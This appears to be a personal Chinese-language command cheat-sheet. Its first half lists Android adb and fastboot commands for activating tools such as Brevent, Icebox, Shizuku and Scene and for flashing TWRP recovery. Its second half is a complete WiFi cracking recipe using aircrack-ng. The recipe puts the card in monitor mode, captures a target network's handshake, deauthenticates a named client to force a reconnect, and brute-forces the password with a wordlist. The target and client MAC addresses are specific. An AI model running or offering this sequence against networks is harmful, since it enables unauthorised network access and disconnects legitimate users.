刷机
黑域
zsh
adb -d shell sh /data/data/me.piebridge.brevent/brevent.sh
冰箱
zsh
adb shell sh /sdcard/Android/data/com.catchingnow.icebox/files/start.sh
刷入 fastboot
zsh
fastboot flash recovery twrp.img
fastboot boot twrp.img
启动 Shizuku
zsh
adb shell sh /sdcard/Android/data/moe.shizuku.privileged.api/start.sh
启动 scene
zsh
adb shell sh /data/user/0/com.omarea.vtools/files/up.sh
开两个 cmd 窗口,一个监听一个踢下线
sh
# 激活无线网卡的监听模式
airmon-ng start wlan0
#扫描当前周边环境的WiFi信号
airodump-ng wlan0
#抓包命令,这个窗口不要关闭
airodump-ng -c 11 –bssid 60:32:B1:56:3F:B2 -w /home/lingdu/桌面/handshake wlan0
# ACK 死亡攻击:
aireplay-ng -0 10 -a 60:32:B1:56:3F:B2 -c F0:72:EA:E8:72:21 wlan0
#10为攻击参数,10为发送次数,a为目标mac,c为源mac
#暴力破解命令:
aircrack-ng -w /root/桌面/password.txt -b 60:32:B1:56:3F:B2 /root/桌面/handshake-0*.cap